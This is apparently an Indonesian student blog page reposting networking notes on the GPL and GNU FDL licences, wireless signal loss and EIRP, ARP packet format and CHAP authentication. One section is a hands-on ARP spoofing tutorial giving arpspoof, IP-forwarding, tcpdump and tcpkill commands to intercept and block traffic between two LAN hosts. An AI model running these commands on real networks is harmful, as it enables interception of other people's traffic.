Minimal Design

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

Easy to use theme’s admin panel

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

Featured posts

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it ...

Archive for 2011

arsitektur komputer

read more

Cloud Computing

read more

Cloud Computing

read more

Cover Diagnosa Wan Aly Dzulfikar

read more

Laporan VPN Aly

read more

Laporan Frame Relay Topologi Real Alyi

read more

instalasi aly

read more

Frekuensi Band Satelit

read more

Laporan Frame Relay Aly

read more

read more

read more

read more

Laporan Chap Pap

read more

read more

read more

General Public License

GPL adalah sebuah lisensi yang menyatakan bahwa sebuah karya intelektual (biasanya software) bebas dipakai, disalin, diedarkan, bahkan dikembangkan oleh siapapun tanpa harus membayar atau ijin terlebih dulu. GPL atau bila diterjemahkan menjadi Lisensi Publik Umum pertama kali dibuat oleh Richard Stallman untuk proyek-proyek pembuatan software di bawah bendera GNU.

GNU sendiri adalah sebuah yayasan pembuat software-software gratis termasuk Linux. Seiring perkembangannya, GPL tidak hanya dipakai oleh GNU dan Linux saja. Sekarang telah ada lebih dari 60.000 aplikasi yang menyatakan dirinya berlisensi GPL. Khusus untuk urusan aplikasi, saat ini telah berdiri Free Software Foundation (FSF) yang merupakan perhimpunan pembuat software gratis sedunia.

Richard StallmanBagi penganut GPL, karya intelektual - seperti halnya ilmu pengetahuan - pada dasarnya tidak memiliki hak cipta. Karena ia berasal dari 'Ide Murni' dan sudah sepantasnya dinikmati oleh seluruh umat manusia karena memang sudah menjadi hak alamiah. 'Ide murni' berbeda dengan barang dagangan seperti meja maupun kursi yang membutuhkan biaya produksi. 'Ide Murni' seperti wahyu, ia datang secara natural langsung dari 'atas sono', maka sudah seharusnya jika ia disebarluaskan demi kemajuan bersama. Berbagai ketentuan GPL tersebut dituangkan dalam ayat-ayat GPL. Kesepakatan GPL sendiri hingga saat ini telah mengalami tiga kali penyempurnaan, yang paling akhir adalah ketentuan GPL versi ke 3 (GPLv3).

Lalu bagaimana cara yayasan-yayasan pembuat software tersebut membiayai dirinya? biasanya dari dua sumber, yang pertama dari iklan dan yang kedua dari sumbangan, baik oleh pemakai software maupun perusahaan-perusahaan yang merasa diuntungkan oleh adanya software tersebut. Memang, GPL tidak bisa menyulap pembuat software bisa sekaya Bill Gates, tetapi kenyataan membuktikan bahwa mereka ternyata lebih dihargai dan dihormati, baik oleh penggunanya maupun oleh para pengembang ilmu pengetahuan itu sendiri.

Harus diakui pula, tanpa ada kesepakatan GPL perkembangan ilmu pengetahuan dan teknologi informasi tidak akan seperti sekarang. Coba bayangkan, jika PHP, MySQL, JavaScript, Apache, Joomla, E-commerce, Wordpress, dan Mozzila tidak berada di bawah lisensi GPL, internet tidak akan semaju ini.. online shop akan pincang, website hanya dimonopoli orang-orang tertentu saja, bisnis online hanya menjadi milik mereka yang memiliki uang .

Software-Software GPL


GPL adalah gebrakan luar biasa yang sempat membuat perusahaan-perusahaan software raksasa seperti Microsoft dan Adobe kebakaran jenggot. Bagaimana tidak? sifat program GPL yang terbuka membuat semua orang dapat mengembangkan dan menyempurnakannya secara bebas. Hasilnya pun luar biasa, banyak software-software GPL yang terbukti lebih sempurna dari pada software-software berbayar, contohnya adalah Firefox atau Opera yang saat ini sedang kita pakai (coba bandingkan dengan Internet Explorer.. ha..ha..). Bandingkan pula tingkat keluwesan PHP & MySQL dengan Ms ASP & Ms SQLServer (yang 'kurang' laku tuh).. ha..ha..

Berbagai komunitas pengguna dan pengembang software GPL pun mulai bermunculan. Biasanya komunitas-komunitas tersebut menolak keras penggunaan software-software komersil. Mereka menggunakan Linux untuk operating system, mengetik dengan OpenOffice, berselancar dengan Firefox, membaca email dengan Thunderbird, ngeblog dengan Wordpress atau Blogspot, bikin website dengan Joomla, mengelola server dengan CPanel, bikin animasi 3D dengan Blender, membuka foto dengan Fastone, mengedit gambar dengan Gimp, dan lain sebagainya.

Free Document License (FDL)

Tujuan dari Lisensi ini adalah untuk membuat suatu manual, buku teks, atau dokumen fungsional dan berguna lainnya menjadi "bebas" dalam pengertian kebebasan: untuk meyakinkan semua orang mengenai kebebasan efektif untuk menyalin dan mendistribusikan ulang, dengan atau tanpa modifikasi, baik untuk tujuan komersial maupun non-komersial. Kedua, Lisensi ini menyediakan suatu jalan bagi pencipta dan penerbit untuk tetap mendapatkan penghargaan bagi karya mereka, tanpa dianggap bertanggung jawab terhadap modifikasi yang dilakukan oleh orang lain.

Lisensi ini merupakan suatu bentuk "copyleft", yang berarti bahwa karya turunan dari dokumen tersebut harus bebas dalam pengertian serupa. Hal tersebut komplementer dengan Lisensi Publik Umum GNU, yang merupakan suatu lisensi copyleft yang dirancang bagi perangkat lunak bebas.

Kami telah merancang Lisensi ini untuk menggunakannya bagi manual perangkat lunak bebas, karena perangkat lunak bebas membutuhkan dokumentasi bebas: suatu program bebas harus disertai dengan manual yang menyediakan kebebasan yang sama seperti yang disediakan perangkat lunaknya. Namun Lisensi ini tidak dibatasi hanya untuk manual perangkat lunak; ia dapat pula digunakan untuk segala karya tekstual, tak tergantung bahasan subjek atau apakah ia diterbitkan sebagai buku cetak. Kami menganjurkan Lisensi ini terutama bagi karya yang tujuannya adalah sebagai petunjuk atau rujukan

MODIFIKASI

Anda dapat menyalin atau mendistribusikan suatu Versi Modifikasi dari Dokumen sesuai dengan kondisi pada bagian 2 dan 3 di atas, asalkan Anda merilis Versi Modifikasi tersebut tepat sesuai Lisensi ini, dengan Versi Modifikasi mengisi posisi Dokumen, sehingga melisensikan distribusi dan modifikasi dari Versi Modifikasi pada siapapun yang memiliki salinannya. Sebagai tambahan, Anda harus melakukan hal-hal berikut pada Versi Modifikasi:

  • A. Gunakan pada Halaman Judul (dan pada sampul, jika ada) suatu judul yang khusus untuk Dokumen, dan dari versi sebelumnya (yang harus, jika ada, didaftarkan pada bagian Riwayat dari Dokumen). Anda dapat menggunakan judul yang sama dengan versi sebelumnya jika penerbit asli versi tersebut memberikan izin.
  • B. Cantumkan pada Halaman Judul, sebagai pencipta, satu atau lebih orang atau entitas yang bertanggung jawab atas ciptaan modifikasi pada Versi Modifikasi, bersama dengan paling tidak lima pencipta utama Dokumen (semua pencipta utama, jika lebih sedikit dari lima), kecuali jika mereka membebaskan Anda dari persyaratan ini.
  • C. Nyatakan pada Halaman Judul nama penerbit Versi Modifikasi sebagai penerbit.
  • D. Pertahankan semua pernyataan hak cipta pada Dokumen.
  • E. Tambahkan pernyataan hak cipta yang diperlukan untuk modifikasi Anda berdekatan dengan pernyataan hak cipta lainnya.
  • F. Sertakan, tepat setelah pernyataan hak cipta, suatu pernyataan lisensi yang memberikan izin publik untuk menggunakan Versi Modifikasi sesuai aturan Lisensi ini, dalam bentuk seperti pada Lampiran di bawah.
  • G. Pertahankan pada pernyataan lisensi tersebut daftar lengkap Bagian Invarian dan Teks Sampul yang disyaratkan untuk diberikan pada pernyataan lisensi Dokumen.
  • H. Cantumkan salinan tak berubah dari Lisensi ini.
  • I. Pertahankan bagian berjudul "Riwayat", Pertahankan Judulnya, dan tambahkan padanya suatu item yang menyatakan paling tidak judul, tahun, pencipta baru, dan penerbit Versi Modifikasi sesuai dengan Halaman Judul. Jika tak terdapat bagian berjudul "Riwayat" pada Dokumen, buat satu yang menyatakan judul, tahun, pencipta, dan penerbit Dokumen sesuai Halaman Judul, lalu tambahkan satu item menjelaskan Versi Modifikasi seperti dijelaskan pada kalimat terdahulu.
  • J. Pertahankan lokasi jaringan, jika ada, yang diberikan dalam Dokumen untuk akses publik ke salinan Transparan Dokumen, dan juga lokasi jaringan yang diberikan pada Dokumen dari versi sebelumnya yang menjadi dasarnya. Semua ini dapat ditempatkan pada bagian "Riwayat". Anda dapat mengesampingkan suatu lokasi jaringan untuk suatu karya yang dipublikasikan paling tidak empat tahun sebelum Dokumen itu sendiri, atau jika penerbit asli versi yang dirujuk tersebut memberikan izin.
  • K. Untuk semua bagian yang berjudul "Penghargaan" atau "Dedikasi", Pertahankan Judul bagian tersebut, dan pertahankan pada bagian itu semua substansi dan gaya penghargaan atau dedikasi yang diberikan tiap kontributor pada bagian tersebut.
  • L. Pertahankan semua Bagian Invarian Dokumen, tanpa perubahan pada teks dan judulnya. Nomor bagian atau ekivalennya tidak dianggap sebagai bagian judul bagian.
  • M. Hapus semua bagian yang berjudul "Pengesahan". Bagian tersebut tidak boleh disertakan dalam Versi Modifikasi.
  • N. Jangan mengubah bagian yang apapun sudah ada menjadi "Pengesahan" atau untuk menimbulkan konflik judul dengan Bagian Invarian.
  • O. Pertahankan semua Penyangkalan Jaminan.

Jika Versi Modifikasi menyertakan bagian utama baru atau lampiran yang layak sebagai Bagian Sekunder dan tidak mengandung bahan yang disalin dari Dokumen, Anda dapat sesuai pilihan menyebutkan beberapa atau seluruh bagian tersebut sebagai invarian. Untuk melakukan hal itu, tambahkan judul mereka pada daftar Bagian Invarian dalam pernyataan lisensi Versi Modifikasi. Judul-judul tersebut harus dapat dibedakan dengan judul-judul bagian lain.

Anda dapat menambahkan suatu bagian berjudul "Pengesahan", asalkan bagian tersebut hanya mengandung pengesahan Versi Modifikasi Anda oleh berbagai pihak--sebagai contoh, pernyataan atau penilaian sejawat atau bahwa teks tersebut telah disetujui oleh suatu organisasi sebagai definisi autoritatif atas suatu standar.

Anda dapat menambahkan suatu rangkaian kata maksimum lima kata sebagai suatu Teks Sampul Muka, dan rangkaian maksimum 25 kata sebagai Teks Sampul Belakang, di akhir daftar Teks Sampul pada Versi Modifikasi. Hanya satu rangkaian kata untuk Teks Sampul Muka dan satu untuk Teks Sampul Belakang yang dapat ditambahkan oleh (atau melalui pengaturan yang dibuat oleh) satu entitas. Jika Dokumen telah mengandung suatu teks sampul untuk sampul yang sama, yang sebelumnya ditambahkan oleh Anda atau oleh pengaturan yang dibuat oleh entitas yang sama yang Anda wakili, Anda tak dapat memberikan tambahan baru; tapi Anda dapat mengganti versi lama, dengan izin eksplisit dari penerbit terdahulu yang menambahkan versi lamanya.

Lisensi ini tidak berarti bahwa pencipta dan penerbit Dokumen memberikan izin untuk menggunakan nama mereka untuk publisitas atau untuk meyakinkan atau memberikan pengesahan terhadap Versi Modifikasi manapun.

Cara menggunakan Lisensi ini pada suatu dokumen

Untuk menggunakan Lisensi ini pada suatu dokumen yang telah Anda tulis, sertakan satu salinan Lisensi di dalam dokumen dan cantumkan pernyataan hak cipta dan lisensi berikut tepat setelah halaman judul:

Hak Cipta (c) TAHUN NAMA ANDA.
Izin diberikan untuk menyalin, mendistribusikan dan/atau memodifikasi
dokumen ini sesuai aturan Lisensi Dokumentasi Bebas GNU, Versi 1.2
atau semua versi yang lebih baru yang dipublikasikan oleh Free
Software Foundation; tanpa Bagian Invarian, tanpa Teks Sampul Depan,
dan tanpa Teks Sampul Belakang. Satu salinan lisensi ini disertakan
pada bagian berjudul "Lisensi Dokumentasi Bebas GNU".

Jika Anda memiliki Bagian Invarian, Teks Sampul Depan dan Teks Sampul Belakang, ganti bagian "tanpa...Teks." dengan ini:

dengan Bagian Invarian adalah DAFTARKAN JUDULNYA, dengan Teks Sampul
Depan adalah DAFTAR, dan dengan Teks Sampul Belakang adalah DAFTAR.

Jika Anda memiliki Bagian Invarian tanpa Teks Sampul, atau kombinasi lain di antara ketiganya, gabungkan kedua alternatif tersebut agar sesuai dengan situasi.

Jika dokumen Anda mengandung contoh non-trivial kode program, kami menganjurkan Anda merilis contoh-contoh tersebut paralel dengan pilihan lisensi perangkat lunak bebas Anda, seperti Lisensi Publik Umum GNU, untuk mengizinkan penggunaannya dalam perangkat lunak bebas.





source :

http://id.wikipedia.org/wiki/Wikipedia:Lisensi_Dokumentasi_Bebas_GNU

http://www.gravisware.com/informasi/96-general-public-license-gpl.html


read more

EIRP adalah total energi yang di keluarkan oleh sebuah access point dan antenna. Saat sebuah Access Point mengirim energinya ke antena untuk di pancarkan, sebuah kabel mungkin ada diantaranya. Beberapa pengurangan besar energi tersebut akan terjadi di dalam kabel. Untuk mengimbangi hal tersebut, sebuah antena menambahkan power / Gain, dengan demikian power bertambah. Jumlah penambahan power tersebut tergantung tipe antena yang digunakan. FCC dan ETSI mengatur besar power yang bisa dipancarkan oleh antena. EIRP inilah yang digunakan untuk memperkirakan area layanan sebuah alat wireless.
Rumus dari EIRP adalah :

EIRP = Power Output Transmitter (AP) - Cable loss + Antenna Gain

Kemudian ada beberapa faktor yang mempengaruhi transmisi sinyal wireless di udara, seperti Free Path Loss, Penyerapan Sinyal, Pemantulan Sinyal, Pemecahan Sinyal, Pembelokan Sinyal dan Line of Sight (LOS).
Apa itu Free Path Loss dan kawan-kawannya yang disebutkan diatas ? berikut penjelasan singkatnya :

  • Free Path Loss
    Model dimana sebuah sinyal yang menjauhi sumbernya makin lama akan menghilang. Ilustrasinya seperti saat anda menjatuhkan batu secara vertikal ke sebuah kolam air, akan terbentuk gelombang yang menjauhi titk batu dijatuhkan dan semakin jauh semakin menghilang, namun tidak berhenti, hanya menghilang. Sama halnya seperti sinyal Gelombang Radio
  • Absorption ( Penyerapan/Peredaman Sinyal )
    Seperti diketahui semakin besar Amplitudo gelombang (Power) Semakin jauh sinyal dapat memancar. Ini baik karena dapat menghemat acess point dan menjangkau lebih luas. Dengan mengurangi besar amplitudo (Power) suatu sinyal, maka jarak jangkauan sinyal tersebut akan berkurang. Faktor yang mempengaruhi transmisi wireless dengan mengurangi Amplitudo (Power) disebut Absorption (Penyerapan sinyal). Efek dari Penyerapan adalah panas. Masalah yang dapat dihadapi ketika signal di serap seluruhnya adalah, sinyal berhenti. Namun efek ini tidak mempengaruhi/ merubah panjang gelombang dan frekuensi dari sinyal tersebut.
    Anda pasti bertanya-tanya, benda apa yang dapat menyerap signal. Tembok, tubuh manusia, dan karpet dapat menyerap/meredam sinyal. Benda yang dapat menyerap/meredam suara dapat meredam sinyal.
    Peredaman sinyal ini perlu diperhitungkan juga saat akan mendeploy jaringan wireless dalam gedung, terutama bila ada kaca dan karpet. karena dalam hal ini peredaman sinyal akan terjadi.
  • Pemantulan Sinyal
    Sinyal radio bisa memantul bila menemui cermin/kaca. Biasanya banyak terjadi pada ruangan kantor yang di sekat. PemantulanI pun tergantung dari frekuensi signalnya. Ada beberapa frekuensi yang tidak terpengaruh sebanyak frekuensi yang lainnya. Dan salah satu efek dari pemantulan sinyal ini adalah terjadinya Multipath.
    Multipath artinya singnal datang dari 2 arah yang berbeda. Karakteristiknya adalah penerima kemungkinan menerima signal yang sama beberapa kali dari arah yang berbeda. Ini tergantung dari panjang gelombang dan posisi penerima. Karakteristik lainnya adalh Multipath dapat menyebabkan sinyal yang = nol, artinya saling membatalkan, atau dikenal dengan istilah Out Of Phase signal.
  • Pemecahan Sinyal / Scattering
    Isu dari pemecahan sinyal terjadi saat sinyal dikrim dalam banyak arah. Hal ini dapat disebabkan oelh beberapa objek yang dapat memantulkan signal dan ujung yang lancip, seperti partikel debu di air dan udara. Ilustrasinya dalah menyinari lampu ke pecahan kaca. Cahaya akan dipantulkan ke banyak arah dan menyebar. Dalam skala besar adalah bayangkan saat cuaca hujan. Hujan yang besar mempunyai kemampuan memantulkan sinyal. oleh karena itu disaat Hujan , sinyal wireless dapat terganggu.
  • Pembelokan Sinyal / Refraction
    Refraction adalah perubahan arah, atau pembelokan dari sinyal disaat sinyal melewati sesuatu yang beda massanya. Sebagai contoh sinyal yang melewati segelas air. Sinyal ada yang di pantulkan dan ada yang dibelokkan.
  • LOS (Line of Sight)
    Line of Sight artinya suatu kondisi dimana pemancar dapat melihat secara jelas tanpa halangan sebuah penerima. Walaupun terjadi kondisi LOS, belum tentu tidak ada gangguan pada jalur tersebut. Dalam hal ini yang harus diperhitungkan adalah - Penyerapan sinyal, pemantulan sinyal, pemecahan sinyal. Bahkan dalam jarak yang lebih jauh bumi menjadi sebuah halangan, seperti kontur bumi, gunung, pohon, dan halangan lingkungan lainnya.

Untuk menentukan pengaruh dari kekuatan sinyal wireles, ada beberapa hal dan metoda yang dapat digunakan yaitu :

  • Fresnel Zone
    Sebagai latar belakang, Augustin-Jean Fresnel adalah seorang fisikawan Prancis dan sarjana sipil yang hidup di tahun 1788 ~ 1827. Beliau secara tepat mengasumsikan bahwa cahaya bergerak seperti gelombang. Dan karena penemuan beliau, sebuah metoda untuk menentukan dimana pemantulan akan terjadi di antara pengirim dan penerima, dan diberi nama seperti namanya. Inilah yang disebut Fresnel Zone. Rumus Fresnel Zone ini dapat menentukan posisi ketinggian antena dengan Jarak yang dapat di tembus oleh sinyal Wireless. Dengan perhitungan yang tepat akan didapatkan hasil yang memuaskan dan tentunya diperhitungkan. Namun penerapan di Indoor sinyalnya terlalu pendek sehingga tidak terlalu berefek dalam jaringan wifi indoor.
  • Received Signal Strength Indicator (RSSI)
    RSSI ini menggunakan nilai yang spesifik untuk tiap vendor. Oleh karena itu penilaian vendor A belum tentu sama dengan vendor B. RSSI biasa diukur dalam besaran dBm. Salah satu alat untk menentukan RSSI adalah software Network Stumbler.
  • Signal to Noise Ratio (SNR)
    SNR adalah istilah yang digunakan untuk menggambarkan seberapa kuat sinyal dibandingkan dengan gangguan di sekeliling yang menggangu sinyal. Bila Sinyal lebih kuat daripada gangguan / Noise maka sinyal dapat di tankap oleh receiver lebih baik, dan sebaliknya demikian. Blla Noise sekitar terlalu besar, maka yang akan di tangkap oleh receiver adalah sinyal yang samr-samar dan transmisi data tidak dimengerti. Bila Aplikasi yang anda gunakan dapat melaporkan pengukuran SNR, lebih baik bila mendapatkan angka yang lebih tinggi, namun juga dibuat berdasar nilai RSSI nya, sehingga juga ditentukan sendiri oleh vendor.
  • Link Budget
    Link Budget adalah nilai yang menghitung semua gain dan loss antara pengirim dan penerima, termasuk atenuasi, penguatan / gain antena, dan loss lainnya yang dapat terjadi. Link Budget dapat berguna untuk menentukan berapa banyak power yang dibutuhkan untuk mengirimkan sinyal agar dapat di mengerti oleh penerima sinyal.
    Berikut adalah rumus sederhana untuk menentukan Link Budget :

Received Power (dBm) = Transmitted Power (dBm) + Gains (dB) - Losses (dB)

Dengan memahami beberapa hal yang dapat mempengaruhi sinyal wireless dan karakteristiknya, maka kita akan dapat membangun jaringan Wireless yang lebih reliable dan diperhitungkan secara keseluruhan. Namun hal tersebut belum tentu tidak berubah karena seiring dengan waktu, pasti faktor-faktor yang ada akan berubah, misalnya tiba tiba dibangun sebuah bangunan yang menghalangi antena pemancar dan penerima, maka sinyal akan terganggu. Namun tentunya semua lebih dapat dimengerti dan beberapa pertanyaan yang misteri dapat di jawab dengan lebih baik.
Terutama bagi anda yang akan mendesign sebuah jaringan wireless yang tidak hanya asal Connect dan jalan.

read more


Address Resolution Protocol (ARP) adalah protokol untuk mapping dari alamat IP (Internet Protocol) ke alamat fisik MAC (Media Access Control). Misal di suatu jaringan kita ingin mengirim paket ke host A 192.168.1.2, maka pertama kita harus tahu sapa yg mempunyai alamat IP tsb. Maka ARP akan membroadcast pertanyaan tsb ke semua host yang ada di jaringan. Sang empunya alamat IP tsb akan menjawab kembali sahutan tsb dengan mengirimkan alamat MACnya. Alamat MAC ini akan disimpan di tabel ARP untuk memudahkan pencarian jika diperlukan pengiriman paket ke tujuan yang sama.

Seperti apa bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP. Header ethernet berupa :
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP

Sedangkan paket ARPna berupa :
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request
,4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima

Format Paket ARP

Pada gambar dibawah memperlihatkan format paket ARP.

Hardware Type : adalah tipe hardware/perangkat keras. Banyak bit dalam field ini adlah 16 bit. Sebagai contoh untuk Ethernet mempunyai tipe 1.
Protocol Type : adalah tipe protokol di mana banyaknya bit dalam field ini 16 bit. Contohnya, untuk protokol IPv4 adalah 080016.
Hardware Length : field berisi 8 bit yang mendefinisikan panjang alamat fisik. Contohnya, untuk Ethernet, panjang alamat fisik adalah 6 byte.
Protocol Length : field berisi 8 bit yang mendefinisikan panjang alamat logika dalam satuan byte. Contoh : untuk protokol IPv4 panjangnya adalah 4 byte.
Operation Request & Reply: field berisi 16 bit ini mendefinisikan jenis paket untuk ARP apakah itu berjenis ARP request atau ARP reply.
Sender Hardware Address : banyaknya field adalah variabel yang mendefinisikan alamat fisik dari pengirim. Untuk Ethernet panjang nya 6 byte.
Sender Protocol Address : field ini panjangnya juga variabel dan untuk mendefiniskan alamat logika (alamat IP) dari pengirim.
Target Hardware Address : field ini panjangnya juga variabel yang mendefiniskan alamat fisik daripada target. Pada paket ARP request, field ini isinya 0 semua.
Target Protocol Address : field ini panjangnya juga variabel dan mendefinisikan alamat logika (IP) dari target.



*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.

ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B. Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dengan ARP Spoofing diantaranya adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.

Apa saja sih yg diperlukan buat ARP Spoofing ini? Kalo saya pakai arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunakan sudah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).

Seperti biasa, unpack paket dsniff lalu configure dan terakhir pake install.Pas saat makai, saya sempat dapat error compiling module sshcrypto :

sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1

Solusinya kita buka dan edit file sshcrypto.c di folder dsniff-2.3, tambahkan :

#include
#include

di deklarasi file header yang diperlukan. Bila sudah selesai dan tidak ada error lagi, coba jalankan si dsniff atau si arpspoof

kita coba meracuni dan ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.

jalankan si arpspoof terlebih dahulu :

root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null

kalo sudah benar nanti di console akan muncul seperti ini :

0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6

Setelah itu bisa kita endus pake dsniff ato tcpdump, misalkan mau pakai tcpdump bisa kita capture hasilna ke file, pake :

root@slack:~# tcpdump -i eth0 -w endus.txt

dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Jadi kita bisa melihatnya dengan tcpdump juga, gunakan :
root@slack:~# tcpdump -r endus.txt
ARP Spoofing, tidak hanya digunakan untuk sniffing tapi bisa juga digunakan untuk memblok koneksi tertentu misal : root@slack:~# tcpkill -9 host www.playboy.com
Untuk mematikan proses si arpspoof n tcpdump bisa dengan cara :
root@slack:~# killall arpspoof
root@slack:~# killall tcpdump

Sumber :
http://rachmad29.blogspot.com/2008/11/sekilas-tentang-arp.html

read more

read more

CHAP
Challenge Handshake Authentication Protocol(CHAP) adalah suatu protocol point to point yang menyediakan layanan autentikasi dengan menggunakan suatu identifier yang berubah-ubah dan suatu variable challenge. CHAP digunakan secara periodik untuk memverfikasi pengguna atau host network menggunakan metode yang dinamakan 3- way handshake. proses ini dilakukan selama inisialisasi link establishment.Proses ini dilakukan selama inisialisasi link establishment. Dan sewaktu-waktu bisa saja diulang setelah hubungan telah terbentuk. Berikut di bawah ini proses yang terjadi pada protokol CHAP :
  1. Setelah fase link establishment selesai, otentikator mengirimkan sebuah pesanchallenge ke peer atau pasangan usernya.
  2. Peer meresponnya dengan menghitung suatu nilai hash-nya.
  3. Otentikator merespon nilai hash tersebut, kemudian membandingkannya. Jika nilai hash-nya sama, maka otentikasi valid, sebaliknya koneksi bisa saja diputus.
  4. Pada interval tertentu (ditentukan secara acak), otentikator mengirimkan suatuchallenge baru kepada peer dan peer meresponnya seperti pada tahap (2).
  5. Begitupun dengan otentikator merespon nilai hash tersebut seperti pada tahap (3).

Spesifikasi Umum CHAP

  1. Persyaratan Desain
Algoritma CHAP mensyaratkan bahwa panjang nilai secret minimal harus delapan oktet (64-bit). Dan juga nilai secret tersebut diusahakan tidak terlalu pendek serta susah untuk ditebak (tidak bersifat umum, contoh : root, 123456, dan lain-lain). Nilaisecret tersebut disarankan minimal sepanjang nilai hashnya (hal ini tergantung dari algoritma hash yang dipilih) atau dengan kata lain panjangnya tidak kurang dari nilai hashnya. Hal ini dimaksudkan agar cukup tahan terhadap exhaustive search attack. Masing - masing nilai challenge harus unique (tidak sama satu sama lain), karena perulangan dari nilai challenge tersebut dalam hal ini untuk nilai secret yang sama, akan memberikan peluang bagi attacker untuk melakukan replay attack. Oleh karena itu diharapkan bahwa untuk nilai secret yang sama yang digunakan untuk melakukan
otentikasi dengan server – server pada wilayah yang berbeda-beda, nilai challenge-nya harus menunjukkan keunikan. Disamping itu juga, nilai challenge harus bersifatunpredictable. Karena dengan nilai challenge yang bersifat unpredictable, dapat melindungi dari serangan – serangan aktif dengan jangkauan yang luas.
  1. Kelebihan
CHAP memberikan perlindungan terhadap playback attack yang dilakukan olehpeer. Kegunaan dari challenge yang diulang-ulang adalah dimaksudkan untuk membatasi waktu pembukaan untuk suatu single attack. Otentikator bertugas mengontrol frekuensi dan waktu dari challenges. Metode otentikasi ini tergantung pada suatu nilai secret yang hanya diketahui oleh otentikator danpeer yanag bersangkutan dimana nilai secret tersebut tidak dikirimkan lewat jaringannya. Walaupun otentikasinya bersifat satu arah (one way), melalui negosiasi CHAP pada kedua arah, maka nilai secret yang sama dapat dengan mudah digunakan untuk mutual authentication.
  1. Kekurangan
Disamping memiliki kelebihan, CHAP juga memiliki kekurangan yakni nilaisecret-nya harus tersedia dalam bentuk plaintext. Basis data untuk passwordyang terenkripsi satu arah, ada yang tidak bisa digunakan. Sehingga hal tersebut membuat CHAP tidak baik untuk jaringan yang lebih luas. Hal ini karena akan membuat instalasi yang besar yang harus dikelola di kedua pihak (peer) dalam jaringan.

Pilihan format konfigurasi untuk CHAP:

§ Type - 3
§ Length - 5
§ Authentication-Protocol - C223 (Hex) untuk CHAP
§ Algorithm - algoritma berisi satu oktet yang mengindikasikan metode authentikasi yang digunakan

Packet format

§ Code - mengidentifikasi tipe paket CHAP:
1. Challenge;
2. Response;
3. Success;
4. Failure.
§ Identifier – identifier yang digunakan dalam pencocokan challanges, responses and replies.
§ Length – panjang bit dari paket CHAP yang berisi Code, Identifier, Length and Data fields.
§ Data - 0 atau lebih oktet, formatnya ditentukan oleh Code field.

Challenge and response

Paket challenge digunakan untuk protokol autentikasi challenge-handshake (CHAP). Pihak autentikasi harus mengirim paket CHAP dengan kolom kode yang di-set 1. Tambahan paket challenge harus dikirim sampai paket Respon yang valid diterima, atau pilihan lain yang counternya telah berakhir.
Paket challenge dapat ditransmisikan setiap saat selama layer protokol jaringan dapat menjamin koneksi tidak mengalami perubahan.
Suatu pihak harus memperkirakan paket challenge selama fase autentikasi dan fase protokol Lapisan jaringan. Setiap kali paket challenge diterima, pihak tsb mengirim paket dengan kolom kode di-set 2 (response).
Setiap kali paket response diterima, pihak autentikasi akan membandingkan nilairesponse dengan nilai perhitungan yang diharapkan. Berdasarkan perbandingan ini, pihak autentikasi harus mengirim paket Sukses atau Gagal.
Implementasi: karena kesuksesan dapat hilang atau gagal, maka pihak autentikasi dapat mengulang paket response selama fase protokol lapisan jaringan menyelesaikan tahap autentikasi. Untuk mencegah penemuan alternatif Nama dan Kunci rahasia, setiap paket response yang diterima memiliki identitas challenge yang kembali dengan jawaban yang sama sebelumnya untuk challenge yang spesifik ( namun bagian pesan dapat berbeda). Setiap paket response yang diterima dalam fase lainnya harus dihilangkan secara diam-diam. Ketika kegagalan dapat dihilangkan dan pihak autentikasi memberhentikan hubungan, LCP terminate-request-terminate-ack akan memberikan indikasi lain bahwa autentikasi gagal.
Ringkasan mengenai format paket challenge dan response adalah sebagai berikut:
Field yang ditransmisikan dari kiri ke kanan.
1. Code
Bernilai: 1 untuk challenge
2 untuk response
2. Field Identifier
Field identifier berisi satu byte. Field identifier harus diubah setiap kali paketchallenge dikirim. ID response harus disalin dari kolom ID challenge yang menyebabkan response.
3. Value-size
Field ini berisi satu byte dan menjelaskan panjang dari kolom Value
4. Value
